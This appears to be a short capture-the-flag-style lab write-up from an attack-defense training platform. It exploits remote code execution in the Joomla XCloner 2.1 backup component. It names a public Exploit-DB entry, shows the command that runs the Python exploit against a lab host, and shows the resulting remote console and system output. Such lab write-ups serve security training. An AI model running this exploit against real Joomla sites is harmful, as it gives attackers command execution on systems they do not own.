#########################################################
Mission provided by attack defense lab
#########################################################
A version of Joomla com_xcloner Component is vulnerable to remote code execution attack.

objective:  Find and exploit this vulnerability.

#########################################################

Joomla component (com_xcloner-backupandrestore) remote code execution exploit

#########################################################
Vulnerable point:  
XCloner Manage-backup and restore:

#########################################################

Version : xcloner 2.1

#########################################################

Exploit:   https://www.exploit-db.com/exploits/16246
# 
# 	| ----------------------------------------------------------------------------- |
# 	| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
# 	| by mr_me - net-ninja.net ---------------------------------------------------- |
# 

#########################################################
Run the exploit: 

ec2-user@kali:~$ python xcloner_joomla.py -t s8hxhsl5tnw9cb37ztmwffkdz.public2.attackdefenselabs.com -d /joomla/

	| ----------------------------------------------------------------------------- |
	| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
	| by mr_me - net-ninja.net ---------------------------------------------------- |

(+) Targeting http://s8hxhsl5tnw9cb37ztmwffkdz.public2.attackdefenselabs.com/joomla/
(!) Exploit working!
(+) Droping to remote console (q for quit)

ec2-user@s8hxhsl5tnw9cb37ztmwffkdz.public2.attackdefenselabs.com# uname -a
 Linux attackdefense.com 4.15.0-43-generic #46-Ubuntu SMP Thu Dec 6 14:45:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

ec2-user@s8hxhsl5tnw9cb37ztmwffkdz.public2.attackdefenselabs.com# 


